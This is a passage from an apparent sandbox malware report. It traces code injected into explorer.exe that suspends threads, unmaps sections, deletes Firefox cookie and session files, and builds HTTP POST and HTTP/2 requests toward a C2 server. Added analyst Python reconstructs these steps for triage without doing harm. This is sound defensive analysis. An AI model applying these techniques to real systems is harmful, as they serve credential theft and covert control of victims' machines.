                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0322358D
                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(03226038), ref: 032235C1
                                                                                                                                        • Part of subcall function 03221274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03221281
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                                                                                                      • String ID: $Content-Length:$POST
                                                                                                                                      • API String ID: 2960674810-114478848
                                                                                                                                      • Opcode ID: 36cecb3efe401ba15b9d1ec0bad8c8e80254e825ccd4a66fa27eb575bca67d19
                                                                                                                                      • Instruction ID: 0bc6c0205b026079597c781345f5f2f3b16c94aa6fa11c5f7ef7ad1fe6cb6f1d
                                                                                                                                      • Opcode Fuzzy Hash: 36cecb3efe401ba15b9d1ec0bad8c8e80254e825ccd4a66fa27eb575bca67d19
                                                                                                                                      • Instruction Fuzzy Hash: 0B312A7A624361BFC725FF20BC4CAA97F6ABB58200F08401CE9054B249CBF9D69DCB51
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 032216D9
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 032216E1
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032216F1
                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 032216FF
                                                                                                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0322171E
                                                                                                                                      • SuspendThread.KERNEL32(00000000), ref: 0322172E
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0322173D
                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0322174D
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 03221758
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1467098526-0
                                                                                                                                      • Opcode ID: 08afa3fbfc963ed974e460ae903e105b06fc2a61f5145ef52170afbf0830b411
                                                                                                                                      • Instruction ID: be690fc96a3f3eac93291db286553231d52a2a7006d2649c6325e9dd0800efd0
                                                                                                                                      • Opcode Fuzzy Hash: 08afa3fbfc963ed974e460ae903e105b06fc2a61f5145ef52170afbf0830b411
                                                                                                                                      • Instruction Fuzzy Hash: 2911A032418211FBD325BF61AC4CA6ABFB8EF95B01F048419FA4582144D33096C98BA7
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                        • Part of subcall function 03221363: Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                        • Part of subcall function 03221363: CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,03223834,?,03223C53,00000001), ref: 032236B3
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,03223834,?,03223C53,00000001), ref: 032236CC
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,03223834,?,03223C53,00000001), ref: 032236DC
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 0322150D
                                                                                                                                        • Part of subcall function 032214D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 03221557
                                                                                                                                        • Part of subcall function 032214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
                                                                                                                                        • Part of subcall function 032214D8: DeleteFileW.KERNEL32(00000000), ref: 03221571
                                                                                                                                        • Part of subcall function 032214D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
                                                                                                                                        • Part of subcall function 032214D8: FindClose.KERNEL32(00000000), ref: 0322158F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                                                                                                      • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                                                                                                      • API String ID: 2731919298-637609321
                                                                                                                                      • Opcode ID: 78aa6dcca780958efb9f3744312da8236144d2d2974b1e9b545dd83348664e62
                                                                                                                                      • Instruction ID: e087323ed354adb035f354cb7e52ba086c224fe8def253e334543640e986efe9
                                                                                                                                      • Opcode Fuzzy Hash: 78aa6dcca780958efb9f3744312da8236144d2d2974b1e9b545dd83348664e62
                                                                                                                                      • Instruction Fuzzy Hash: 69F0A015320270339628B36B6C0CD7F1D5ECBE6F52700411CB60A9A680CE941AC282B9
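The block above (SHGetSpecialFolderPathW with CSIDL 0x1A, lstrcatW of "\Mozilla\Firefox\Profiles\", then a FindFirstFileW/FindNextFileW loop that resets attributes and deletes matches for "cookies.sqlite" and "sessionstore.*") is a Firefox profile wiper. The following dry-run reconstruction is an added example, not code from the sample or from Joe Sandbox: it lists what that loop would hit in a profile tree without deleting anything, so a responder can compare against a live machine. The profile layout it builds is constructed for the demo; the one-level walk and the read-only check are inferred from the API sequence, not confirmed by it.

```python
"""Dry-run reconstruction of the Firefox profile wiper visible in this trace.

Added example, not code from the sample or from Joe Sandbox. It mirrors what
the API sequence shows: SHGetSpecialFolderPathW(CSIDL 0x1A = APPDATA), lstrcatW
of "\\Mozilla\\Firefox\\Profiles\\", one FindFirstFileW/FindNextFileW pass per
profile for the reported patterns, SetFileAttributesW(FILE_ATTRIBUTE_NORMAL)
and then DeleteFileW. Nothing here deletes anything: it lists what the loop
would have hit. The profile layout in build_demo_profile() is constructed.
"""
import fnmatch
import os
import stat
import tempfile

# Patterns from the report's String ID line. FindFirstFileW matches names
# case-insensitively, so the name is lower-cased before fnmatchcase().
TARGET_PATTERNS = ("cookies.sqlite", "sessionstore.*")
PROFILES_SUBPATH = os.path.join("Mozilla", "Firefox", "Profiles")


def profiles_root(appdata):
    """Equivalent of SHGetSpecialFolderPathW(CSIDL_APPDATA) + lstrcatW."""
    return os.path.join(appdata, PROFILES_SUBPATH)


def find_targets(appdata):
    """Return [(relative_path, read_only)] for every file the loop would delete.

    read_only marks files whose attributes block a plain delete, which is why
    the trace resets attributes with SetFileAttributesW before DeleteFileW.
    The walk is one level deep, like the single wsprintfW/FindFirstFileW pair
    in the trace, so sessionstore-backups\\recovery.jsonlz4, where a running
    Firefox keeps its live session, is not reached.
    """
    hits, root = [], profiles_root(appdata)
    if not os.path.isdir(root):
        return hits
    for profile in sorted(os.listdir(root)):
        pdir = os.path.join(root, profile)
        if not os.path.isdir(pdir):
            continue
        for name in sorted(os.listdir(pdir)):
            full = os.path.join(pdir, name)
            if not os.path.isfile(full):
                continue  # directories such as sessionstore-backups are skipped
            if any(fnmatch.fnmatchcase(name.lower(), p) for p in TARGET_PATTERNS):
                read_only = not (os.stat(full).st_mode & stat.S_IWUSR)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                hits.append((rel, read_only))
    return hits


def build_demo_profile():
    """Constructed profile tree under a temp dir; returns the fake APPDATA."""
    appdata = tempfile.mkdtemp(prefix="appdata_")
    prof = os.path.join(profiles_root(appdata), "abcd1234.default-release")
    os.makedirs(os.path.join(prof, "sessionstore-backups"))
    for rel in ("cookies.sqlite", "sessionstore.jsonlz4", "places.sqlite",
                os.path.join("sessionstore-backups", "recovery.jsonlz4")):
        with open(os.path.join(prof, rel), "wb") as fh:
            fh.write(b"\x00")
    os.chmod(os.path.join(prof, "cookies.sqlite"), stat.S_IREAD)  # read-only
    return appdata


if __name__ == "__main__":
    for path, ro in find_targets(build_demo_profile()):
        print(("read-only " if ro else "          ") + path)
```

Run against a real %APPDATA% the function only reports; the interesting output is the read-only column (the files the sample has to touch with SetFileAttributesW first) and the absence of sessionstore-backups\recovery.jsonlz4, which the one-level wildcard never reaches while Firefox is running.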
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                        • Part of subcall function 0322106C: lstrlen.KERNEL32(?,?,00000000,00000000,0322189F,75568A60,?,00000000), ref: 03221074
                                                                                                                                        • Part of subcall function 0322106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 03221086
                                                                                                                                        • Part of subcall function 032217DC: RtlZeroMemory.NTDLL(?,00000018), ref: 032217EE
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 032218FB
                                                                                                                                      • wsprintfW.USER32 ref: 032219F2
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03221AD0
                                                                                                                                      Strings
                                                                                                                                      • Accept: */*Referer: %S, xrefs: 032219E8
                                                                                                                                      • POST, xrefs: 032219A0
                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 03221A34
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                      • Opcode ID: 095d69de1066dc4a75eb62c5f64d2e28718e11f256a06a5879fb4a9261ec45b1
                                                                                                                                      • Instruction ID: e1a9d8e37af913f008a1a3ed3a4d6dfc11d676136bfc72ef4870125e8c3c2b2b
                                                                                                                                      • Opcode Fuzzy Hash: 095d69de1066dc4a75eb62c5f64d2e28718e11f256a06a5879fb4a9261ec45b1
                                                                                                                                      • Instruction Fuzzy Hash: FC818975208311BFD720EF6A9C88E2BBBE9FB88644F04492DF945C7250DB70EA50CB52
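The function above assembles a raw HTTP/1.1 request from the literals "POST", "Content-Type: application/x-www-form-urlencoded" and a wsprintfW format "Accept: */*Referer: %S" (the CRLF between the two headers was most likely dropped by the string dump; %S is the wsprintfW conversion for an ANSI string), with "Content-Length:" appearing in the critical-section function earlier in this section. The code below is an added example, not the sample's code: it builds the request shape those strings imply, parses it back with a Content-Length check, and flags requests that carry exactly the reported header literals. The header order, User-Agent, host and path are assumptions for the demo.

```python
"""Raw HTTP/1.1 POST as the string set implies, built and then parsed back.

Added example, not the sample's code. Only the literals "POST",
"Accept: */*", "Referer:", "Content-Type: application/x-www-form-urlencoded"
and "Content-Length:" come from the report; header order, User-Agent, host
and path are assumptions made for the demo.
"""
from urllib.parse import parse_qs, urlencode

CRLF = "\r\n"
# Header lines present verbatim in the report's strings.
REPORTED_HEADERS = {"accept": "*/*",
                    "content-type": "application/x-www-form-urlencoded"}


def build_post(host, path, referer, fields, user_agent="Mozilla/5.0"):
    """Assemble the request bytes; Content-Length is derived from the body."""
    body = urlencode(fields).encode("ascii")
    head = (f"POST {path} HTTP/1.1{CRLF}Host: {host}{CRLF}"
            f"User-Agent: {user_agent}{CRLF}"
            f"Accept: */*{CRLF}Referer: {referer}{CRLF}"
            f"Content-Type: application/x-www-form-urlencoded{CRLF}"
            f"Content-Length: {len(body)}{CRLF}{CRLF}")
    return head.encode("ascii") + body


def parse_request(raw):
    """Return (method, target, headers, body); body is cut at Content-Length."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.decode("latin-1").split(CRLF)
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    if len(rest) < length:
        raise ValueError("body shorter than Content-Length")
    return method, target, headers, rest[:length]


def form_fields(body):
    """Decode an application/x-www-form-urlencoded body to a flat dict."""
    return {k: v[0] for k, v in parse_qs(body.decode("ascii")).items()}


def matches_reported_strings(method, headers):
    """True when a request carries exactly the header literals in the dump."""
    return (method == "POST" and "referer" in headers
            and all(headers.get(k) == v for k, v in REPORTED_HEADERS.items()))
```

matches_reported_strings is a triage filter for proxy or PCAP output, not a signature: the three literals are common enough that it only narrows candidates, and the real discriminator is the destination the head of this report lists under C2 URLs.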
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0322104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03222A16,?,00000001), ref: 03221056
                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 032225BB
                                                                                                                                      • lstrcat.KERNEL32(?,032242A8), ref: 032225C7
                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 032225D6
                                                                                                                                      • lstrcat.KERNEL32(?,032242AC), ref: 032225E5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcat$AllocVirtual
                                                                                                                                      • String ID: :authority$?$dyn_header
                                                                                                                                      • API String ID: 3028025275-1785586894
                                                                                                                                      • Opcode ID: 26e2355f025e5d94b3a46547df72bc363dda7881bab02ec9514598051bdd64e9
                                                                                                                                      • Instruction ID: 8fe087cddc882dc56cb85d152b33dd464245e87a275a756d9b01c57d3ccc2478
                                                                                                                                      • Opcode Fuzzy Hash: 26e2355f025e5d94b3a46547df72bc363dda7881bab02ec9514598051bdd64e9
                                                                                                                                      • Instruction Fuzzy Hash: 50616C72528333EFC754EE21DD8067ABFD5AB94210F040D1DE8815B282CBBA998DC762
                                                                                                                                      APIs
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 032213A3
                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 032213C0
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 868014591-0
                                                                                                                                      • Opcode ID: 957f841718a245a3817fc22bbe14797f4d663c827994ff89b50451b9ade32446
                                                                                                                                      • Instruction ID: adab2f78e2edc990c751dc6f55f6fa938eee1b72f600fab9ad37885f85ef026b
                                                                                                                                      • Opcode Fuzzy Hash: 957f841718a245a3817fc22bbe14797f4d663c827994ff89b50451b9ade32446
                                                                                                                                      • Instruction Fuzzy Hash: 7AF0C831511124BBD734BA26AC0CFDE7BBCEB59721F0001A0F849D2184EB745AE48A94
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0322291B
                                                                                                                                      • lstrcat.KERNEL32(?,032242BC), ref: 0322292A
                                                                                                                                      • lstrlen.KERNEL32(?,75568A60,00000001,?,?,00000000,?,?,03222B26,?,?,?,?,00000001), ref: 0322295C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$MemoryMovelstrcat
                                                                                                                                      • String ID: cookie
                                                                                                                                      • API String ID: 2957667536-1295510418
                                                                                                                                      • Opcode ID: d864b41c01231658d1fd7f27f0548662a5d8abba346d165195e3dc8099f63684
                                                                                                                                      • Instruction ID: 6370ad6371f14c7595fd741d8edbc922a7a3d8a2a50110acfa6f6825de6c7e49
                                                                                                                                      • Opcode Fuzzy Hash: d864b41c01231658d1fd7f27f0548662a5d8abba346d165195e3dc8099f63684
                                                                                                                                      • Instruction Fuzzy Hash: 97110D32314326BBC710EE5ADC85BABBED9DB90700F28092DF80197241EBB3E9C54751
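The two lstrcat/lstrlen functions above carry ":authority", "?", ":method POST", "cookie" and "dyn_header". The first three are HTTP/2 header names (":method POST" is static-table entry 3 of RFC 7541, ":authority" entry 1, "cookie" entry 32) and "dyn_header" suggests a dynamic header table, which is how HPACK references previously sent headers. The trace does not show whether the sample actually HPACK-encodes these or only builds the header list in memory, so the codec below is an added example, not the sample's code: it is the minimal RFC 7541 encoder/decoder an analyst needs to read a HEADERS frame payload out of a capture of this traffic. Only a subset of the static table is included, Huffman-coded literals are rejected rather than decoded, and the host, path and cookie values used in the usage note are constructed.

```python
# Minimal HPACK (RFC 7541) codec. Added example, not the sample's or Joe Sandbox's
# code; that the sample HPACK-encodes the ":authority", ":method POST" and
# "cookie" strings it carries is an assumption. Huffman literals are rejected.
# Subset of the RFC 7541 Appendix A static table, using the RFC's indices.
STATIC_TABLE = {
    1: (":authority", ""), 2: (":method", "GET"), 3: (":method", "POST"),
    4: (":path", "/"), 6: (":scheme", "http"), 7: (":scheme", "https"),
    31: ("content-type", ""), 32: ("cookie", ""), 58: ("user-agent", ""),
}
STATIC_SIZE = 61  # full static table length; dynamic entries start at 62

def encode_int(value, prefix_bits, flag_bits=0):
    # Section 5.1 integer: N-bit prefix, then 7-bit continuation bytes.
    mask = (1 << prefix_bits) - 1
    if value < mask:
        return bytes([flag_bits | value])
    out, value = bytearray([flag_bits | mask]), value - mask
    while value >= 0x80:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)

def decode_int(data, pos, prefix_bits):
    mask = (1 << prefix_bits) - 1
    value, pos, shift = data[pos] & mask, pos + 1, 0
    if value < mask:
        return value, pos
    while True:
        b, pos = data[pos], pos + 1
        value, shift = value + ((b & 0x7F) << shift), shift + 7
        if not b & 0x80:
            return value, pos

def encode_string(text):
    return encode_int(len(text), 7) + text.encode("latin-1")  # H bit clear

def decode_string(data, pos):
    if data[pos] & 0x80:
        raise NotImplementedError("Huffman literal: needs the Appendix B code")
    length, pos = decode_int(data, pos, 7)
    return data[pos:pos + length].decode("latin-1"), pos + length

class HpackTable:
    """Static + dynamic table; an entry costs name + value + 32 (section 4.1)."""
    def __init__(self, max_size=4096):
        self.max_size, self.dynamic = max_size, []  # newest dynamic entry first

    def lookup(self, index):
        if index <= STATIC_SIZE:  # index 0 is invalid and raises KeyError too
            return STATIC_TABLE[index]
        return self.dynamic[index - STATIC_SIZE - 1]

    def add(self, name, value):
        self.dynamic.insert(0, (name, value))
        self.evict()

    def evict(self):
        while sum(len(n) + len(v) + 32 for n, v in self.dynamic) > self.max_size:
            self.dynamic.pop()  # the oldest entry leaves first

    def find(self, name, value):
        # (index, exact): best match over static then dynamic entries.
        entries = list(STATIC_TABLE.items()) + [
            (STATIC_SIZE + 1 + i, e) for i, e in enumerate(self.dynamic)]
        exact = [i for i, e in entries if e == (name, value)]
        by_name = [i for i, (n, _) in entries if n == name]
        return (exact[0], True) if exact else ((by_name[0] if by_name else 0), False)

def hpack_encode(table, headers):
    # Indexed field where possible, else literal with incremental indexing.
    out = bytearray()
    for name, value in headers:
        idx, exact = table.find(name, value)
        if exact:
            out += encode_int(idx, 7, 0x80)
            continue
        out += encode_int(idx, 6, 0x40) + (b"" if idx else encode_string(name))
        out += encode_string(value)
        table.add(name, value)  # the peer's decoder adds the same entry
    return bytes(out)

def hpack_decode(table, data):
    headers, pos = [], 0
    while pos < len(data):
        b = data[pos]
        if b & 0x80:                            # 1xxxxxxx  indexed field
            idx, pos = decode_int(data, pos, 7)
            headers.append(table.lookup(idx))
        elif b & 0xE0 == 0x20:                  # 001xxxxx  table size update
            table.max_size, pos = decode_int(data, pos, 5)
            table.evict()
        else:                                   # 01 / 0000 / 0001 literal forms
            prefix = 6 if b & 0x40 else 4
            idx, pos = decode_int(data, pos, prefix)
            name, pos = (table.lookup(idx)[0], pos) if idx else decode_string(data, pos)
            value, pos = decode_string(data, pos)
            if prefix == 6:                     # incremental indexing
                table.add(name, value)
            headers.append((name, value))
    return headers
```

With a constructed request list such as [(":method", "POST"), (":scheme", "https"), (":authority", "c2.example"), (":path", "/?id=7"), ("cookie", "u=1")], the first encode yields 0x83 0x87 (indexed :method POST and :scheme https) followed by literals that carry the authority, the "?" query path and the cookie; a second identical request collapses to five single bytes, because the three literals now sit in the dynamic table at indices 62 to 64. That is the effect a "dyn_header" structure in the sample would be there to track, and it is why a capture of the second and later requests cannot be read without replaying the first through the same table.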
                                                                                                                                      APIs
                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000), ref: 032212BC
                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 032212CE
                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 032212E1
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 032212F7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 331459951-0
                                                                                                                                      • Opcode ID: 430da6f9fefa63fd14265bfa4326e3661f5a846aa2ea7cbdab9747c66164ba46
                                                                                                                                      • Instruction ID: 0d999b48c1a3b2a332668fbecd913a25220c32cac35dcaa71708f9f997db301f
                                                                                                                                      • Opcode Fuzzy Hash: 430da6f9fefa63fd14265bfa4326e3661f5a846aa2ea7cbdab9747c66164ba46
                                                                                                                                      • Instruction Fuzzy Hash: 06F09071816239FF9B24EFA1AD48CEEBB6CEB01251F14936AF801D2140DB315F819AA1
                                                                                                                                      APIs
                                                                                                                                      • RtlEnterCriticalSection.NTDLL(03226038), ref: 03223332
                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(03226038), ref: 03223358
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                      • String ID: POST
                                                                                                                                      • API String ID: 3168844106-1814004025
                                                                                                                                      • Opcode ID: a2939d15fa6959ee66b77e96300b2b0b2d73b59d15e8df785dc1ffa97d57c028
                                                                                                                                      • Instruction ID: f67b3966c922d5fbf24f4cc7a85c7ededb2646a4728afcfbb0f266f7eca8266b
                                                                                                                                      • Opcode Fuzzy Hash: a2939d15fa6959ee66b77e96300b2b0b2d73b59d15e8df785dc1ffa97d57c028
                                                                                                                                      • Instruction Fuzzy Hash: 3201A23A520224FBCB31AF11EC4CC5E7F29FF8566171C4410F60986125CF79CAD096E0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:6.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:20
                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                      execution_graph 1667 d9d748 1669 d9d74d 1667->1669 1668 d9d835 LoadLibraryA 1668->1669 1669->1668 1672 d9d884 VirtualProtect VirtualProtect 1669->1672 1673 d9d879 1669->1673 1671 d9d912 1671->1671 1672->1671 1674 d9d5da 1675 d9d614 1674->1675 1676 d9d91d 1675->1676 1679 d9d748 1675->1679 1681 d9d74d 1679->1681 1680 d9d835 LoadLibraryA 1680->1681 1681->1680 1684 d9d884 VirtualProtect VirtualProtect 1681->1684 1685 d9d6f8 1681->1685 1683 d9d912 1683->1683 1684->1683 1686 d9d637 1687 d9d62e 1686->1687 1688 d9d91d 1687->1688 1689 d9d748 3 API calls 1687->1689 1690 d9d6f8 1689->1690

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 105 d95300-d95310 call d91be8 108 d95390-d95395 105->108 109 d95312-d95345 call d91838 105->109 113 d95371-d9538a NtUnmapViewOfSection 109->113 114 d95347 call d91838 109->114 116 d9539c-d953ab call d95104 113->116 117 d9538c-d9538e 113->117 120 d9534c-d95365 114->120 124 d953ad-d953b0 call d95300 116->124 125 d953b5-d953be 116->125 117->108 118 d95396-d9539b call d94c80 117->118 118->116 120->113 124->125
                                                                                                                                      APIs
                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 00D95378
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                      • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                      • Instruction ID: 0202f37d1a21ba4fe78f81e2dacbdecfb4c7612e4d37c09a32eab487db758b99
                                                                                                                                      • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                      • Instruction Fuzzy Hash: 10112534601D094FEF5EFBB8A4993793395FB15302F58013AE41AC72A6DE39CA818330

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00D91B74: OpenFileMappingA.KERNEL32 ref: 00D91B8B
                                                                                                                                        • Part of subcall function 00D91B74: MapViewOfFile.KERNELBASE ref: 00D91BAA
                                                                                                                                      • SysFreeMap.PGOCR ref: 00D951A9
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D951B3
                                                                                                                                      • Process32First.KERNEL32 ref: 00D951D6
                                                                                                                                      • Process32Next.KERNEL32 ref: 00D952D9
                                                                                                                                      • CloseHandle.KERNELBASE ref: 00D952EA
                                                                                                                                      • SleepEx.KERNELBASE ref: 00D952F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32View
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2838107584-0
                                                                                                                                      • Opcode ID: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                                                                                                      • Instruction ID: a2278c2b6b6f65b8576a0712359180e3708f9389c6de9b1a863b6eb0a6565c46
                                                                                                                                      • Opcode Fuzzy Hash: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                                                                                                      • Instruction Fuzzy Hash: 5A517730204E098FEF5AEF68E899AA973E1FB94301F444729E44BC71A5DF78D905C7A1

                                                                                                                                      Control-flow Graph

